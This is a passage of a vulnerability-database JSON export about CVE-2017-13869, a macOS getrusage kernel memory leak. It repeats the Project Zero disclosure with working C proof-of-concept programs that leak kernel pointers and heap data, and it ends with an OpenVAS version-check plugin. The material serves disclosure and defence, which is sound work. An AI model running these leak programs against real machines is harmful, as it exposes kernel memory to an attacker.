pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.", "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS getrusage stack leak through struct padding(CVE-2017-13869)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96990", "id": "SSV:96990", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-14T15:50:10", "description": "Exploit for macOS platform in category dos / poc", "edition": 1, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS getrusage Stack Leak Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "href": "https://0day.today/exploit/description/29199", "id": "1337DAY-ID-29199", "sourceData": "MacOS getrusage stack leak through struct padding \r\n\r\nCVE-2017-13869\r\n\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\r\n\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29199", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2017-12-13T22:59:48", "description": "", "published": "2017-12-12T00:00:00", "type": "packetstorm", "title": "macOS getrusage Stack Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "PACKETSTORM:145364", "href": "https://packetstormsecurity.com/files/145364/macOS-getrusage-Stack-Leak.html", "sourceData": "`MacOS getrusage stack leak through struct padding \n \nCVE-2017-13869 \n \n \nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: \n \nint \ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) \n{ \nstruct rusage *rup, rubuf; \nstruct user64_rusage rubuf64; \nstruct user32_rusage rubuf32; \nsize_t retsize = sizeof(rubuf); /* default: 32 bits */ \ncaddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */ \nstruct timeval utime; \nstruct timeval stime; \n \n \nswitch (uap->who) { \ncase RUSAGE_SELF: \ncalcru(p, &utime, &stime, NULL); \nproc_lock(p); \nrup = &p->p_stats->p_ru; \nrup->ru_utime = utime; \nrup->ru_stime = stime; \n \nrubuf = *rup; \nproc_unlock(p); \n \nbreak; \n[...] \n} \nif (IS_64BIT_PROCESS(p)) { \nretsize = sizeof(rubuf64); \nretbuf = (caddr_t)&rubuf64; \nmunge_user64_rusage(&rubuf, &rubuf64); \n} else { \n[...] \n} \n \nreturn (copyout(retbuf, uap->rusage, retsize)); \n} \n \n`munge_user64_rusage()` performs the conversion by copying individual fields: \n \n__private_extern__ void \nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) \n{ \n/* timeval changes size, so utime and stime need special handling */ \na_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; \na_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; \na_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; \na_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; \n[...] \n} \n \n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: \n \n#define _STRUCT_USER64_TIMEVAL struct user64_timeval \n_STRUCT_USER64_TIMEVAL \n{ \nuser64_time_t tv_sec; /* seconds */ \n__int32_t tv_usec; /* and microseconds */ \n}; \n \nstruct user64_rusage { \nstruct user64_timeval ru_utime; /* user time used */ \nstruct user64_timeval ru_stime; /* system time used */ \nuser64_long_t ru_maxrss; /* max resident set size */ \n[...] \n}; \n \nThis padding is not initialized, but is copied to userspace. \n \n \nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. \n \n \nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers. \nThe returned data seems to come from the previous syscall: \n \n$ cat test.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); \nmemcpy(&leak1, ((char*)&ru)+28, 4); \nprintf(\"leak1: 0x%08x\\n\", leak1); \nprintf(\"leak2: 0x%08x\\n\", leak2); \n} \n \nint main(void) { \ndo_leak(); \ndo_leak(); \ndo_leak(); \nint fd = open(\"/dev/null\", O_RDONLY); \ndo_leak(); \nint dummy; \nread(fd, &dummy, 4); \ndo_leak(); \nreturn 0; \n} \n$ gcc -o test test.c && ./test \nleak1: 0x00000000 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff81 \nleak2: 0x00000000 \n \n \nHowever, I believe that this can also be used to disclose kernel heap memory. \nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack \nwithout zeroing it, so the new stack contains data from previous heap allocations. \nThe following testcase, when run after repeatedly reading a wordlist into memory, \nleaks some non-pointer data that seems to come from the wordlist: \n \n$ cat forktest.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); \nmemcpy(&leak1, ((char*)&ru)+28, 4); \nchar str[1000]; \nif (leak1 != 0) { \nsprintf(str, \"leak1: 0x%08x\\n\", leak1); \nwrite(1, str, strlen(str)); \n} \nif (leak2 != 0) { \nsprintf(str, \"leak2: 0x%08x\\n\", leak2); \nwrite(1, str, strlen(str)); \n} \n} \n \nvoid leak_in_child(void) { \nint res_pid, res2; \nasm volatile( \n\"mov $0x02000002, %%rax\\n\\t\" \n\"syscall\\n\\t\" \n: \"=a\"(res_pid), \"=d\"(res2) \n: \n: \"cc\", \"memory\", \"rcx\", \"<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>\" \n); \n//write(1, \"postfork\\n\", 9); \nif (res2 == 1) { \n//write(1, \"child\\n\", 6); \ndo_leak(); \nchar dummy; \nread(0, &dummy, 1); \nasm volatile( \n\"mov $0x02000001, %rax\\n\\t\" \n\"mov $0, %rdi\\n\\t\" \n\"syscall\\n\\t\" \n); \n} \n//printf(\"fork=%d:%d\\n\", res_pid, res2); \nint wait_res; \n//wait(&wait_res); \n} \n \nint main(void) { \nfor(int i=0; i<1000; i++) { \nleak_in_child(); \n} \n} \n$ gcc -o forktest forktest.c && ./forktest \nleak1: 0x1b3b1320 \nleak1: 0x00007f00 \nleak1: 0x65686375 \nleak1: 0x410a2d63 \nleak1: 0x8162ced5 \nleak1: 0x65736168 \nleak1: 0x0000042b \n \nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist. \n \n \nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \nFound by: jannh \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145364/GS20171212052204.txt"}], "exploitdb": [{"lastseen": "2017-12-11T20:50:14", "description": "macOS - 'getrusage' Stack Leak Through struct Padding. CVE-2017-13869. Dos exploit for macOS platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "macOS - 'getrusage' Stack Leak Through struct Padding", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:43319", "href": "https://www.exploit-db.com/exploits/43319/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); // default: 32 bits \r\n caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits \r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n // timeval changes size, so utime and stime need special handling \r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; // seconds \r\n __int32_t tv_usec; // and microseconds \r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; // user time used \r\n struct user64_timeval ru_stime; // system time used \r\n user64_long_t ru_maxrss; // max resident set size \r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak2, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n/*\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n*/", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43319/"}], "openvas": [{"lastseen": "2019-05-29T18:34:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13844", "CVE-2017-13869", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-10002", "CVE-2017-7173", "CVE-2017-7154", "CVE-2017-13862"], "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-03-18T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812401", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_HT208331_02.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple MacOSX Security Updates(HT208331)-02\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812401\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-13868\", \"CVE-2017-13869\", \"CVE-2017-3735\", \"CVE-2017-13855\",\n\t\t\"CVE-2017-13844\", \"CVE-2017-9798\", \"CVE-2017-13847\", \"CVE-2017-13833\",\n\t\t\"CVE-2017-10002\", \"CVE-2017-13867\", \"CVE-2017-13862\", \"CVE-2017-7172\",\n \"CVE-2017-1000254\", \"CVE-2017-15422\", \"CVE-2017-7159\", \"CVE-2017-7162\",\n \"CVE-2017-13904\", \"CVE-2017-7173\", \"CVE-2017-7154\");\n script_bugtraq_id(100515, 100872, 101946);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:36 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update includes,\n\n - A validation issue was addressed with improved input sanitization.\n\n - An out-of-bounds read issue existed in X.509 IPAddressFamily parsing.\n\n - A type confusion issue was addressed with improved memory handling.\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - Multiple issues were addressed by updating to version 2.4.28.\n\n - Multiple memory corruption issues were addressed through improved state management.\n\n - An out-of-bounds read was addressed with improved bounds checking.\n\n - An out-of-bounds read issue existed in the FTP PWD response parsing.\n\n - An integer overflow error.\n\n - An input validation issue existed in the kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read restricted memory, execute arbitrary code with system\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.13.x through 10.13.1, 10.12.x through 10.12.6, 10.11.x through 10.11.6\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[1-3]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[1-3]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\")\n {\n if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G18013\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1114\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer == \"10.13.1\"){\n fix = \"10.13.2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}